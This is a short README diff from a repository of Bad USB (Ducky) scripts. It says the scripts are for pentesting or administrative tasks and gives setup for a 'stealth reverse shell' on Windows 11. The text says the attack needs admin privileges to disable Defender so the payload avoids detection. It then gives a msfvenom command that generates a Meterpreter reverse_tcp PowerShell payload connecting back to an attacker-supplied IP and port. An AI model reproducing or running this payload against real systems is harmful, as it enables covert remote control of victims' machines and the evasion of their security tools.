Turbul3nce/Bad-USB-Scripts/README.md

 # Various Ducky scripts for Bad USBs
 ### Can be used for pentesting or administrative tasks.
+### Below text is applies to the stealth reverse shell.
+### Requires Admin privileges to disable Defender.
+Otherwide payload may be detected.
+### Tested on Windows 11 Home
 # On The Attacker's Machine
 ### Create the payload with msfvenom<br/>
 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=AttacksersIP LPORT=AttackersPort -f psh -o PAYLOAD.ps1<br/>